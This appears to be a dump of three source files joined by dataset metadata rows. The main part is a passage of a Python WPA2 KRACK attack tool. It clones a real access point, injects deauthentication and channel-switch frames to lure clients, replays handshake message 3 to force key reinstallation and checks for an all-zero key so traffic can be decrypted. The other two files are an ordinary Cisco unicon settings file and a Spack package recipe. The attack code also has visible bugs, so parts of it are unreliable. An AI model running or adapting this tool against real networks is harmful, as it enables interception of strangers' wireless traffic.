elif el.ID == IEEE_TLV_TYPE_VENDOR and el.info[:4] == "\x00\x50\xf2\x02":
self.wmmenabled = 1
el = el.payload
def get_rouge_channel(self):
return self.rouge_channel
#writes the config file for hostapd to use
def write_config(self, iface):
self.rouge_channel = 1 if self.real_channel >= 6 else 11
log(DEBUG, 'Rouge channel is: %s'%str(self.rouge_channel))
CONFIG = """
ctrl_interface=hostapd_ctrl
ctrl_interface_group=0
interface={iface}
ssid={ssid}
channel={channel}
wpa={wpaver}
wpa_key_mgmt={akms}
wpa_pairwise={pairwise}
rsn_pairwise={pairwise}
rsn_ptksa_counters={ptksa_counters}
rsn_gtksa_counters={gtksa_counters}
wmm_enabled={wmmenabled}
wmm_advertised={wmmadvertised}
hw_mode=g
auth_algs=3
wpa_passphrase=XXXXXXXX"""
akm2str = {2: "WPA-PSK", 1: "WPA-EAP"}
ciphers2str = {2: "TKIP", 4: "CCMP"}
return CONFIG.format(
iface = iface,
ssid = self.ssid,
channel = self.rouge_channel,
wpaver = self.wpavers,
akms = " ".join([akm2str[idx] for idx in self.akms]),
pairwise = " ".join([ciphers2str[idx] for idx in self.pairwise_ciphers]),
ptksa_counters = (self.capab & 0b001100) >> 2,
gtksa_counters = (self.capab & 0b110000) >> 4,
wmmadvertised = 1, #int(args.group), #no group args would be 0
wmmenabled = self.wmmenabled)
#This class reprisents a client object that we can man-in-the-middle
#and use to use and store data as the connected client
class Client:
Initializing, Connecting, GotMitm, Attack_Started, Success_Reinstalled, Success_AllzeroKey, Failed = range(7)
def __init__(self, macaddr, utils):
self.macaddr = macaddr
self.utils = utils
self.reset()
def reset(self):
self.state = Client.Initializing
self.keystreams = dict()
self.attack_max_iv = None
self.attack_time = None
self.assocreq = None
self.msg1 = None
self.msg2 = None
self.msg3s = []
self.msg4 = None
self.krack_finished = False
def set_msg1(self, msg1):
self.msg1 = msg1
def write_state(self, state):
if state == 0: return 'Initializing'
if state == 1: return 'Connecting'
if state == 2: return 'GotMitm'
if state == 3: return 'Attack_Started'
if state == 4: return 'Success_Reinstalled'
if state == 5: return 'Success_AllzeroKey'
if state == 6: return 'Failed'
def get_replay_num(self, p):
return struct.unpack('>Q', str(p[EAPOL])[9:17])[0]
def set_state(self, state):
return self.state == state
def add_new_msg3(self, msg3):
#simply add's any new msg3's to the list
if self.get_replay_num(msg3) in [self.get_replay_num(p) for p in self.msg3s]:
return
self.msg3s.append(msg3)
def update_clientstate(self, state):
log(DEBUG, 'Client (%s) state has moved to %s'%(self.macaddr, self.write_state(self.state)))
self.state = state
def mark_got_mitm(self):
if self.state == Client.Connecting or self.state == Client.Initializing:
self.state = Client.GotMitm
log(STATUS, 'Man-in-the-Middle posistion established against client (%s). Moved to stage %s'%(self.macaddr, self.write_state(self.state)))
def should_forward(self, p):
if self.state in [Client.Connecting, Client.GotMitm, Client.Attack_Started]:
return Dot11Auth in p or Dot11AssoReq in p or Dot11AssoResp in p or\
(1 <= get_eapol_msg_num(p) and get_eapol_msg_num(p) <= 3)\
or (p.type == 0 and p.subtype == 13)
return self.state in [Client.Success_Reinstalled]
def save_iv_keystream(self, iv, keystream):
self.keystreams[iv] = keystream
def get_keystream(self, iv):
return self.keystreams[iv]
def is_iv_reused(self, iv):
return self.set_state(Client.Attack_Started) and iv in self.keystreams
def attack_start(self):
#gets the latest IV
self.attack_max_iv = 0 if len(self.keystreams.keys()) == 0 else max(self.keystreams.keys())
#log the start of the attack time
self.attack_time = time.time()
#update the state
self.update_clientstate(Client.Attack_Started)
def attack_timeout(self, iv):
return self.set_state(Client.Attack_Started) and self.attack_time + 1.5 < time.time() and self.attack_max_iv < iv
class KrackAttack:
def __init__(self, rouge_interface, interface, target_client, ssid, log, big_verbose, sniffer):
#these 3 varibles contain system arg's pasred from command line
#they specify which function(s) to run
self.big_verbose = big_verbose
self.rouge_iface = rouge_interface
self.iface = interface
self.iface_mon = None
self.rouge_iface_mon = None
self.rouge_mac = None
self.iface_client_ack = None
self.sniff = sniffer
#if there is a target client then this just cleans up the mac addr if needed
self.t_clientmac = None if target_client is None else target_client
self.ssid = ssid
self.Clients = dict()
self.ap_mac_addr = None
self.ivs = IvCollection()
self.rouge_channel = None
self.clientMac = None
self.dhcp = None
self.rouge_sock = None
self.f_sock = None
self.hostapd = None
self.hostapd_ctrl = None
self.ip_forward = None
self.group_ip = None
self.group_arp = None
self.TK = None
self.beacon = None
self.real_ap_mac = None
self.utils = None
self.disas_queue = []
self.null_frames = []
def config_internet(self, iface, eth_iface='eth0'):
log(INFO, 'Forwarding internet through %s'%eth_iface)
subprocess.call(['rm', '-r', './enable_internet_forwarding.sh', eth_iface, iface])
def finish_attack(self, client):
if client.assocreq is None:
log(WARNING, '''No association request was capture from client (%s), cannot pass client to rouge hostapd to handle'''%client.macaddr)
return
#adding the client to hostapd
log(INFO, 'Registering client with rouge hostapd')
p = Dot11(addr1=self.real_ap_mac, addr2=client.macaddr, addr3=self.real_ap_mac)/Dot11Auth(seqnum=1)
self.hostapd_ctrl.request("RX_MGMT "+ str(p[Dot11]).encode('hex'))
#send the encryption algorithm too
self.hostapd_ctrl.request("RX_MGMT "+str(client.assocreq[Dot11]).encode('hex'))
#tell hostapd that the handshake is finished
self.hostapd_ctrl.request("FINISH_4WAY %s"%client.macaddr)
def handle_from_pairwise(self, client, p):
#this sequence is to strip the frame check sequence as scapy can't handle it
#(only 4 bytes to skip)
plaintext = "\xaa\xaa\x03\x00\x00\x00"
encrypted = p[Dot11WEP].wepdata[4:4+len(plaintext)]
keystream = self.utils.xorstr(plaintext, encrypted)
iv = dot11_get_iv(p)
#check fo IV and then keystream reuse
if client.is_iv_reused(iv):
#if the keystream from the client object is the same as the keystream from the frame recived then
#we have a normal key reinsalltion
if keystream == client.get_keystream(iv):
log(STATUS, '''KEYSTREAM And NONCE reused detected! (IV=%s)'''%iv)
client.update_clientstate(Client.Success_Reinstalled)
#to finish the handshake adn give the client an IP
if client.msg4 is not None:
self.f_sock.send(client.msg4)
self.utils.print_packet(STATUS, 'Rouge Channel', client.msg4, suffix='-- Finishing Auth')
log(STATUS, ''''Sending EAPOL msg4 to finish the "authentication"''')
#If the keystream isn't the same then the client has installed a new key
#(hopefully an all zero key)
else:
log(STATUS, '''NONCE reuse detected! Testing for an all-zero key (IV=%s)'''%iv)
#attemps to decrypt the frame and check if the first 6 bytes are as expected if an
#all zero key is used
if decrypt_ccmp(p, '\x00'*16).startswith('\xAA\xAA\x03\x00\x00\x00'):
log(STATUS, 'SUCCSESS! All-Zero key is being used! packets can now be decrypted!')
client.update_clientstate(Client.Success_AllzeroKey)
else:
#otherwise it's an normal key reinstalltion
client.update_clientstate(Client.Success_Reinstalled)
self.finish_attack(client)
#if clients are completly patched, or the attack is taking too long then we'll mark
#the client as failed
elif client.attack_timeout(iv):
log(ERROR, 'Attack agaisnt client (%s) failed.'%client.macaddr)
client.update_clientstate(Client.Failed)
#saves the keystream so we can compare it next frame
client.save_iv_keystream(iv, keystream)
def handle_to_pairwise(self, client, p):
eapol_num = get_eapol_msg_num(p)
#Saves msg1 for later use
if eapol_num == 1 and client.state in [Client.Connecting, Client.GotMitm]:
log(DEBUG, 'Got Msg1!')
client.set_msg1(p)
elif eapol_num == 3 and client.state in [Client.Connecting, Client.GotMitm]:
client.add_new_msg3(p)
#We need to send at least 2 msg3's to the client, once we do, we can forward them
if len(client.msg3s) >= 2:
log(STATUS, '''Got at least 2 EAPOL message 3's!''')
log(STATUS, '''Preforming a Key Re-installation attack against client: %s'''%client.macaddr)
#sending the stored msg 3's
packet_list = client.msg3s
p = self.utils.set_replay_num(client.msg1, get_replay_num(packet_list[0]) + 1)
packet_list.insert(1, p)
for p in packet_list:
self.rouge_sock.send(p)
#resetting the msg3's list and marking the client as attack start
client.msg3s = []
client.attack_start()
else:
log(STATUS, '''Not got enought EAPOL MSG3's to forward on yet (%s have been queued)'''%len(client.msg3s))
return True
return False
def handle_rouge_iface(self):
p = self.rouge_sock.recv()
if p == None: return
# 1. Handle frames sent BY the rouge AP
if p.addr2 == self.real_ap_mac:
#Display all frames sent to the targeted client
if self.t_clientmac is not None and p.addr1 == self.t_clientmac:
self.utils.print_packet(INFO, "Rogue channel", p)
#And display all frames sent to a MitM'ed client
elif p.addr1 in self.Clients:
self.utils.print_packet(INFO, "Rogue channel ", p)
# 2. Handle frames sent TO the AP
elif p.addr1 == self.real_ap_mac:
client = None
#Check if it's a new client that we can MitM
if Dot11Auth in p:
self.utils.print_packet(INFO, "Rogue channel", p, color='green')
self.Clients[p.addr2] = Client(p.addr2, self.utils)
self.Clients[p.addr2].mark_got_mitm()
client = self.Clients[p.addr2]
will_forward = True
log(DEBUG, 'Client set-up complete')
#Otherwise check of it's an existing client
elif p.addr2 in self.Clients:
client = self.Clients[p.addr2]
if self.sniff != True :
will_forward = client.should_forward(p)
else: True
self.utils.print_packet(INFO, "Rogue channel", p)
#Always display all frames sent by the targeted client
elif p.addr2 == self.t_clientmac:
self.utils.print_packet(INFO, "Rogue channel", p, suffix='--Target')
#If this now belongs to a client we want to krack, this will process the packet further
if client is None: log(DEBUG, 'Client is None object')
if client is not None:
#Save association request for config info
if Dot11AssoReq in p: client.assocreq = p
# Save msg4 so we can complete the handshake after the attack has been carried out
if get_eapol_msg_num(p) == 4: client.msg4 = p
#got this far means the client is definatly connectyed to the rouge AP
client.mark_got_mitm()
if Dot11WEP in p:
self.handle_from_pairwise(client, p)
if will_forward:
# Don't mark client as sleeping when we haven't got two Msg3's and performed the attack
if client.state < Client.Attack_Started:
p.FCfield &= 0xFFEF
self.f_sock.send(p)
#handling DHCP with scapy if the attack has been succsesfull
#if client.state == [Client.Success_Reinstalled, Client.Success_AllzeroKey, Client.Failed]:
if p.haslayer(DHCP):
self.dhcp.reply(p)
self.group_arp.reply(p)
# 3. Always display all frames sent by or to the targeted client
elif p.addr1 == self.t_clientmac or p.addr2 == self.t_clientmac:
self.utils.print_packet(INFO, "Rogue channel", p)
def handle_iface(self):
p = self.f_sock.recv()
if p is None: return
#1. Handle frames sent TO the real AP
if p.addr1 == self.real_ap_mac:
#If it's an authentication to the real AP we want to switch the client over to our AP
if Dot11Auth in p:
#shows the auth packet
self.utils.print_packet(INFO, "Real channel ", p, color="orange")
if self.t_clientmac == p.addr2:
log(WARNING, "Client %s is connecting on real channel, injecting CSA beacon to try to correct." % self.t_clientmac)
#it'll be a new client so we want to delete any previous config and start clean
if p.addr2 in self.Clients: del self.Clients[p.addr2]
#Sending two CSA's to switch target to our rouge channel
self.utils.send_csa_beacon(self.rouge_channel, self.beacon, self.f_sock, target=p.addr2)
self.utils.send_csa_beacon(self.rouge_channel, self.beacon, self.f_sock)
#adding client to Clients
self.Clients[p.addr2] = Client(p.addr2, self.utils)
self.Clients[p.addr2].update_clientstate(Client.Connecting)
#Remember association request to save connection info
elif Dot11AssoReq in p:
if p.addr2 in self.Clients: self.Clients[p.addr2].assocreq = p
self.utils.print_packet(INFO, 'Real Channel', p, suffix='--saved')
#Clients sending a deauthentication or disassociation to the real AP
elif Dot11Deauth in p or Dot11Disas in p:
self.utils.print_packet(INFO, "Real channel ", p)
if p.addr2 in self.Clients: del self.Clients[p.addr2]
#For all other frames, only display them if they come from the targeted client
elif self.t_clientmac is not None and self.t_clientmac == p.addr2:
self.utils.print_packet(INFO, "Real channel ", p)
#Prevent the AP from thinking clients that are connecting are sleeping
if p.FCfield & 0x10 != 0 and p.addr2 in self.Clients and self.Clients[p.addr2].state <= Client.Attack_Started:
log(WARNING, "Injecting Null frame so AP thinks client %s is awake" % p.addr2)
null = Dot11(type=2, subtype=4, addr1=self.real_ap_mac, addr2=p.addr2, addr3=self.real_ap_mac)
self.f_sock.send(null)
self.null_frames.append(null)
#if the client connects to real channel during attack rouge ap will spam null frames
#this fixes the spamming and sends CSA's to try to switch client back to rouge channel
if len in self.null_frames <=10:
self.utils.send_csa_beacon(self.rouge_channel, self.beacon, self.f_sock, target=p.addr2)
self.utils.send_csa_beacon(self.rouge_channel, self.beacon, self.f_sock)
self.null_frames = []
#2. Handle frames sent BY the real AP
elif p.addr2 == self.real_ap_mac:
#decide weather it'll be forwarded
might_forward = p.addr1 in self.Clients and self.Clients[p.addr1].should_forward(p)
#Deauth and Disas frames are interesting
if Dot11Deauth in p or Dot11Disas in p:
self.utils.print_packet(INFO, "Real channel ", p)
#If targeting a specific client, display all frames it sends
elif self.t_clientmac is not None and self.t_clientmac == p.addr1:
self.utils.print_packet(INFO, "Real channel ", p)
#For other clients, just display what might be forwarded
elif might_forward:
self.utils.print_packet(INFO, "Real channel ", p)
#This is where the frames get forwarded on or not
if might_forward:
if p.addr1 in self.Clients:
client = self.Clients[p.addr1]
#Handles the key reinstalltion for frames going TO the client
if self.handle_to_pairwise(client, p):
pass
elif Dot11Deauth in p:
del self.Clients[p.addr1]
self.rouge_sock.send(p)
else:
self.rouge_sock.send(p)
else:
self.rouge_sock.send(p)
# 3. Always display all frames sent by or to the targeted client
elif p.addr1 == self.t_clientmac or p.addr2 == self.t_clientmac:
self.utils.print_packet(INFO, "Real channel ", p)
def run(self):
self.netconfig = Network_Config()
self.config_interface()
#creating the sockets to run hostapd and capture packets
self.rouge_sock = MitmSocket(type=ETH_P_ALL, iface=self.rouge_iface_mon, verb=self.big_verbose)
self.f_sock = MitmSocket(type=ETH_P_ALL, iface=self.iface, verb=big_verbose)
#initing the Utils class from libclass, this will have utility methodsto use
self.utils = Utils(self.iface, self.rouge_iface, self.ssid, log)
#getting the beacon frame form the real AP
self.beacon, self.real_ap_mac = self.utils.find_beacon(self.rouge_sock)
if self.beacon and self.real_ap_mac is 'ex':
self.restart()
log(DEBUG, 'self.real_ap_mac is: %s'%self.real_ap_mac)
#extracting the info we need from the beacon
self.netconfig.get_beacon_info(self.beacon)
#checking compatibility
if self.sniff == False:
if not self.netconfig.check_wparsn():
log(ERROR, '''%s isn't a WPA1/2 secured network, Exiting....'''%self.ssid)
self.restart()
elif self.netconfig.real_channel > 13:
log(WARNING, '''%s is opertating on 5GHz. The attack isn't tested on this frequency, but we'll try anyway'''%self.ssid)
#if the target AP is compatible this writes the config file for hostapd to clone the AP
with open("hostapd_rogue.conf", "w") as fp:
fp.write(self.netconfig.write_config(self.rouge_iface))
#setting the mac addr of the rouge interface, and the ack interface if there's a target
self.utils.set_mac_address(self.rouge_iface, self.real_ap_mac)
if self.iface_client_ack: subprocess.check_output(["ifconfig", self.iface_client_ack, "up"])
#BPF filter will increase preformace. latancy isn't something that you want on a rouge AP
bpf = "(wlan addr1 {apmac}) or (wlan addr2 {apmac})".format(apmac=self.real_ap_mac)
if self.t_clientmac:
bpf += " or (wlan addr1 {clientmac}) or (wlan addr2 {clientmac})".format(clientmac=self.t_clientmac)
bpf = "(wlan type data or wlan type mgt) and (%s)" % bpf
self.rouge_sock.attach_filter(bpf)
self.f_sock.attach_filter(bpf)
self.rouge_channel = self.netconfig.get_rouge_channel()
#starting hostapd deamon
try:
self.hostapd = subprocess.Popen(['../hostapd/hostapd', './hostapd_rogue.conf'])
#give time for hostapd to startup so we can attach to it
time.sleep(2)
except OSError:
log(ERROR, '''ERROR: Could not find the hostapd client, check hostapd's directory, did you compile?''')
raise
except Exception as e:
log(ERROR, '''ERROR: Couldn't open hostapd, did you disable wifi in networking/compile the hostapd deamon?\nEXCEPTION: %s'''%e)
raise
time.sleep(1)
#connecting to the hostapd control interface
try:
path = ('hostapd_ctrl/'+self.rouge_iface)
self.hostapd_ctrl = Ctrl(path)
self.hostapd_ctrl.attach()
except Exception as e:
log(ERROR, 'FATAL ERROR: Could not attach to hostapd control intnterface\nEXCEPTION: %s'%e)
self.restart()
raise
#DHCP can be handled with scapy
self.dhcp = DHCP_sock(sock=self.rouge_sock,
domain='testing.com',
pool=Net('192.168.100.0/24'),
network='192.168.100.0/24',
gw='192.168.100.254',
renewal_time=600,
lease_time=3600)
#setting the interface to the right IP
subprocess.check_output(["ifconfig", self.rouge_iface, "192.168.100.254"])
#some more IP config
self.group_ip = self.dhcp.pool.pop()
self.group_arp = ARP_sock(sock=self.rouge_sock, IP_addr=self.group_ip, ARP_addr=self.real_ap_mac)
#configuring internet forwarding
self.config_internet(self.rouge_iface)
#Sending Channel Switch Alert to any clients
self.utils.send_csa_beacon(self.netconfig.rouge_channel, self.beacon, self.f_sock, 5)
#Deauth all clients so they connect to the rouge AP
log(INFO, 'Deauthing connected clients')
self.utils.client_deauth(self.f_sock, 2, silent=True)
if self.t_clientmac:
self.queue_disas(self.t_clientmac)
log(STATUS, 'Waiting on stations to connect')
#The main event loop, this will monitor both interfaces for incomming frames, and send any queued
#disas frames to clients
while True:
#monitoring both interfaces
sel = select.select([self.rouge_sock, self.f_sock], [], [], 0.1)
if self.rouge_sock in sel[0]:
self.handle_rouge_iface()
if self.f_sock in sel[0]:
self.handle_iface()
#sending any queued dissas frames
while len(self.disas_queue) > 0 and self.disas_queue[0][0] <= time.time():
self.send_disas(self.disas_queue.pop()[1])
#queue's Dissasociations to be sent in a timely mannor in the event loop
def queue_disas(self, macaddr):
if macaddr in [macaddr for shedtime, macaddr in self.disas_queue]: return
heapq.heappush(self.disas_queue, (time.time() + 0.5, macaddr))
#send's dissasociation frames to clients
def send_disas(self, macaddr, hush=False):
p = Dot11(addr1=macaddr, addr2=self.real_ap_mac, addr3=self.real_ap_mac)/Dot11Disas(reason=0)
self.f_sock.send(p)
if not hush:
log(INFO, 'Rouge Channel > Injected Dissasociation frame to %s'%macaddr)
def config_interface(self):
#Just to be sure..
subprocess.check_output(["rfkill", "unblock", "all"])
if self.rouge_iface_mon is None:
subprocess.call(["iw", self.rouge_iface + "mon", "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
#setting the interface to monitor mode
subprocess.check_output(["ifconfig", self.iface, "down"])
subprocess.check_output(["iw", self.iface, 'set', 'type', 'monitor'])
subprocess.check_output(["ifconfig", self.iface, "up"])
#creating the rouge interface's virtul monitor mode
if self.rouge_iface_mon is None:
self.rouge_iface_mon = self.rouge_iface + 'mon'
subprocess.check_output(["iw", self.rouge_iface, 'interface', 'add', self.rouge_iface_mon, 'type', 'monitor'])
subprocess.check_output(["ifconfig", self.rouge_iface_mon, 'up'])
#some linux distro's don't configure the virtual monitor interface properly, the next few lines are
#to make sure it does.
time.sleep(2)
subprocess.check_output(['ifconfig', self.rouge_iface_mon, 'down'])
subprocess.check_output(['iw', self.rouge_iface_mon, 'set', 'type', 'monitor'])
subprocess.check_output(['ifconfig', self.rouge_iface_mon, 'up'])
#this sets an interface to act like the client so to acknowlage frames.
if self.t_clientmac:
log(DEBUG, self.t_clientmac)
self.iface_client_ack = self.iface + 'sta1'
subprocess.check_output(["iw", self.iface, "interface", "add", self.iface_client_ack, "type", "managed"])
set_mac_address(self.iface_client_ack, self.t_clientmac)
else:
log(WARNING, '''Targeting all clients isn't reccomended. Add a target with --target''')
time.sleep(1)
#shows the final config of the interface for debbuing
string = 'interface is: {interface}, rouge interface is: {rouge_interface}, rouge monitor interface is: {rouge_mon_interface}, normal monitor interface is: {mon_interface}, SSID is: {ssid}'.format(interface=self.iface, rouge_interface=self.rouge_iface, rouge_mon_interface=self.rouge_iface_mon, mon_interface=self.iface, ssid=self.ssid)
log(DEBUG, string)
def restart(self):
#restarts services, and ensures everything goes back to defaults
log(INFO, 'Cancelling...')
subprocess.call(['killall', 'hostapd'])
time.sleep(0.5)
log(INFO, 'Restarting services...')
try:
subprocess.check_output(['iw', self.rouge_iface+'mon', 'del'])
subprocess.check_output(['ifconfig', self.rouge_iface, 'down'])
subprocess.check_output(['iw', self.iface+'sta1', 'del'])
except:
log(WARNING, 'No interface to delete')
subprocess.Popen(['service', 'NetworkManager', 'start'])
subprocess.Popen(['service', 'network-manager', 'start'])
subprocess.Popen(['service', 'wpa_supplicant', 'start'])
time.sleep(1.5)
log(STATUS, 'Exiting...')
sys.exit(1)
if __name__ == "__main__":
#passing the comand line args from hostapd to their
#respective variables
args = docopt(__doc__, version='v0.9')
rouge_interface = args["<rouge_interface>"]
interface = args["<interface>"]
ssid = args["<ssid>"]
target_client = args['<target_client>']
is_target = args['--target']
execute = args['-k']
Restart = args['-r']
sniffer = args['-s']
verbose = args['-v']
big_verbose = args['--vv']
disable_hw = args['--disable-hw']
#configures verbose logging
if big_verbose:
verbose = True
log = Logging(verbose)
#cleaning the SSID
if ssid is not None: ssid.replace( '/', ' ').lower()
#checkign if user is root
if os.geteuid():
log(ERROR, 'ERROR: Must be root, exiting...')
sys.exit(0)
#This is the main class
krack = KrackAttack(rouge_interface, interface, target_client, ssid, log, big_verbose, sniffer)
if execute or sniffer:
log(STATUS, 'Killing any process that might get in the way...')
#Prints out an error if aircrack-ng isn't installed
try:
subprocess.check_output(['airmon-ng', 'check', 'kill'])
except Exception as e:
log(WARNING, '''Could not check for processes that might interfere, install aircrack-ng and don't blame me if it crashes''')
subprocess.call(['killall', 'hostapd'])
try:
krack.run()
except KeyboardInterrupt:
krack.restart()
if disable_hw:
disable_hwcrypto()
if Restart:
krack.restart()
| 37.867801 | 338 | 0.710898 |
7c88ca6b83e9b0ce4d503716bed68187818673fa | 8,944 | py | Python | src/unicon/plugins/generic/settings.py | rich-day/unicon.plugins | 6cb9df66dd08d92ef9ebfc7ce8288afb9217b514 | [
"Apache-2.0"
] | 18 | 2019-11-23T23:14:53.000Z | 2022-01-10T01:17:08.000Z | src/unicon/plugins/generic/settings.py | rich-day/unicon.plugins | 6cb9df66dd08d92ef9ebfc7ce8288afb9217b514 | [
"Apache-2.0"
] | 12 | 2020-11-09T20:39:25.000Z | 2022-03-22T12:46:59.000Z | src/unicon/plugins/generic/settings.py | rich-day/unicon.plugins | 6cb9df66dd08d92ef9ebfc7ce8288afb9217b514 | [
"Apache-2.0"
] | 32 | 2020-02-12T15:42:22.000Z | 2022-03-15T16:42:10.000Z | """
Module:
unicon.plugins.generic
Authors:
pyATS TEAM (pyats-support@cisco.com, pyats-support-ext@cisco.com)
Description:
This module defines the Generic settings to setup
the unicon environment required for generic based
unicon connection
"""
from unicon.settings import Settings
from unicon.plugins.generic.patterns import GenericPatterns
genpat = GenericPatterns()
class GenericSettings(Settings):
"""" Generic platform settings """
def __init__(self):
""" initialize
"""
super().__init__()
self.HA_INIT_EXEC_COMMANDS = [
'term length 0',
'term width 0',
'show version'
]
self.HA_INIT_CONFIG_COMMANDS = [
'no logging console',
'line console 0',
'exec-timeout 0'
]
self.HA_STANDBY_UNLOCK_COMMANDS = [
'redundancy',
'main-cpu',
'standby console enable'
]
self.BASH_INIT_COMMANDS = [
'stty cols 200',
'stty rows 200'
]
self.SWITCHOVER_COUNTER = 50
self.SWITCHOVER_TIMEOUT = 500
self.HA_RELOAD_TIMEOUT = 500
self.RELOAD_TIMEOUT = 300
self.RELOAD_WAIT = 240
self.POST_RELOAD_WAIT = 60
self.RELOAD_RECONNECT_ATTEMPTS = 3
self.CONSOLE_TIMEOUT = 60
# When connecting to a device via telnet, how long (in seconds)
# to pause before checking the spawn buffer
self.ESCAPE_CHAR_CHATTY_TERM_WAIT = 0.25
# number of cycles to wait for if the terminal is still chatty
self.ESCAPE_CHAR_CHATTY_TERM_WAIT_RETRIES = 12
# prompt wait delay
self.ESCAPE_CHAR_PROMPT_WAIT = 0.25
# prompt wait retries
# (wait time: 0.25, 0.5, 0.75, 1.0, 1.25, 1.5, 1.75 == total wait: 7.0s)
self.ESCAPE_CHAR_PROMPT_WAIT_RETRIES = 7
# syslog message handling timers
self.SYSLOG_WAIT = 1
# pattern to replace "more" string
# command to continue for more_prompt_stmt
# when changing MORE_REPLACE_PATTERN, please also change unicon/patterns.py more_prompt
self.MORE_REPLACE_PATTERN = r' *--\s?[Mm]ore\s?-- *'
self.MORE_CONTINUE = ' '
# Sometimes a copy operation can fail due to network issues,
# so copy at most this many times.
self.MAX_COPY_ATTEMPTS = 2
self.COPY_INTERRUPT = '\x03'
# If configuration mode cannot be entered on a newly reloaded device
# because HA sync is in progress, wait this many times and for this long
self.CONFIG_POST_RELOAD_MAX_RETRIES = 20
self.CONFIG_POST_RELOAD_RETRY_DELAY_SEC = 9
self.GUESTSHELL_RETRIES = 20
self.GUESTSHELL_RETRY_SLEEP = 5
# Default error pattern
self.ERROR_PATTERN = [r"% Invalid command at",
r"% Invalid input detected at",
r"% String is invalid, 'all' is not an allowed string at",
r"Incomplete command",
r'% Unrecognized host or address.',
r'Error: Could not open file .*',
r'Unable to deactivate Capture.',
]
self.CONFIGURE_ERROR_PATTERN = [r"overlaps with",
r"% Class-map .* is being used",
r'% ?Insertion failed .*',
r'%Failed to add ace to access-list'
r'Insufficient bandwidth .*',
r'BGP is already running; AS is .*',
r'% Failed to commit one or more configuration items.*',
r'% Configuring IP routing on a LAN subinterface is only allowed if that '
r'subinterface is already configured as part of an IEEE 802.10, IEEE 802.1Q, '
r'or ISL vLAN.',
r'% OSPF: Please enable segment-routing globally',
r"% Invalid input detected at '^' marker"
]
# Number of times to retry for config mode by configure service.
self.CONFIG_LOCK_RETRIES = 3
self.CONFIG_LOCK_RETRY_SLEEP = 10
# for bulk configure
self.BULK_CONFIG = False
self.BULK_CONFIG_END_INDICATOR = '!end indicator for bulk configure'
self.BULK_CONFIG_CHUNK_LINES = 50
self.BULK_CONFIG_CHUNK_SLEEP = 0.5
# for execute matched retry on state pattern
self.EXECUTE_MATCHED_RETRIES = 1
self.EXECUTE_MATCHED_RETRY_SLEEP = 0.05
# User defined login and password prompt pattern.
self.LOGIN_PROMPT = None
self.PASSWORD_PROMPT = None
# Maximum number of retries for password handler
self.PASSWORD_ATTEMPTS = 3
# Ignore log messages before executing command
self.IGNORE_CHATTY_TERM_OUTPUT = False
# How long to wait for config sync after an HA reload.
self.POST_HA_RELOAD_CONFIG_SYNC_WAIT = 400
self.DEFAULT_HOSTNAME_PATTERN = genpat.default_hostname_pattern
# Traceroute error Patterns
self.TRACEROUTE_ERROR_PATTERN = [\
'^.*(% )?DSCP.*does not match any topology',
'Bad IP (A|a)ddress', 'Ping transmit failed',
'Invalid vrf', 'Unable to find',
'No Route to Host.*',
'Destination Host Unreachable',
'Unable to initialize Windows Socket Interface',
'IP routing table .* does not exist',
'Invalid input',
'Unknown protocol -',
'bad context', 'Failed to resolve',
'(U|u)nknown (H|h)ost']
self.LEARN_OS_COMMANDS = [
'show version',
'uname',
]
self.OS_MAPPING = {
'nxos': {
'os': ['Nexus Operating System'],
'platform': {
'aci': ['aci'],
'mds': ['mds'],
'n5k': ['n5k'],
'n9k': ['n9k'],
'nxosv': ['nxosv'],
},
},
'iosxe': {
'os': ['IOS( |-)XE Software'],
'platform': {
'cat3k': ['cat3k'],
'cat9k': ['cat9k'],
'csr1000v': ['csr1000v'],
'sdwan': ['sdwan'],
'nxosv': ['nxosv'],
},
},
'iosxr': {
'os': ['IOS XR Software'],
'platform': {
'asr9k': ['asr9k'],
'iosxrv': ['iosxrv'],
'iosxrv9k': ['iosxrv9k'],
'moonshine': ['moonshine'],
'ncs5k': ['ncs5k'],
'spitfire': ['spitfire'],
},
},
'ios': {
'os': ['IOS Software'],
'platform': {
'ap': ['TBD'],
'iol': ['TBD'],
'iosv': ['TBD'],
'pagent': ['TBD'],
},
},
'junos': {
'os': ['JUNOS Software'],
'platform': {
'vsrx': ['vsrx'],
},
},
'linux': {
'os': ['Linux'],
},
'aireos': {
'os': ['aireos'],
},
'cheetah': {
'os': ['cheetah'],
},
'ise': {
'os': ['ise'],
},
'asa': {
'os': ['asa'],
},
'nso': {
'os': ['nso'],
},
'confd': {
'os': ['confd'],
},
'vos': {
'os': ['vos'],
},
'cimc': {
'os': ['cimc'],
},
'fxos': {
'os': ['fxos'],
},
'staros': {
'os': ['staros'],
},
'aci': {
'os': ['aci'],
},
'sdwan': {
'os': ['sdwan'],
},
'sros': {
'os': ['sros'],
},
'apic': {
'os': ['apic'],
},
'windows': {
'os': ['windows'],
},
}
#TODO
#take addtional dialogs for all service
#move all commands to settings
#
| 34.4 | 118 | 0.445326 |
8870b3197c98dff13b9599b3223d5e7266156a3a | 805 | py | Python | var/spack/repos/builtin/packages/py-bottleneck/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 9 | 2018-04-18T07:51:40.000Z | 2021-09-10T03:56:57.000Z | var/spack/repos/builtin/packages/py-bottleneck/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 907 | 2018-04-18T11:17:57.000Z | 2022-03-31T13:20:25.000Z | var/spack/repos/builtin/packages/py-bottleneck/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 29 | 2018-11-05T16:14:23.000Z | 2022-02-03T16:07:09.000Z | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyBottleneck(PythonPackage):
"""A collection of fast NumPy array functions written in Cython."""
homepage = "https://pypi.python.org/pypi/Bottleneck/1.0.0"
url = "https://pypi.io/packages/source/B/Bottleneck/Bottleneck-1.0.0.tar.gz"
version('1.2.1', sha256='6efcde5f830aed64feafca0359b51db0e184c72af8ba6675b4a99f263922eb36')
version('1.0.0', sha256='8d9b7ad4fadf9648acc924a6ee522c7cb5b474e75faaad9d90dfd55e2805b495')
depends_on('py-setuptools', type='build')
depends_on('py-numpy', type=('build', 'run'))
depends_on('py-nose', type='test')
| 40.25 | 95 | 0.737888 |
Subsets and Splits
No community queries yet
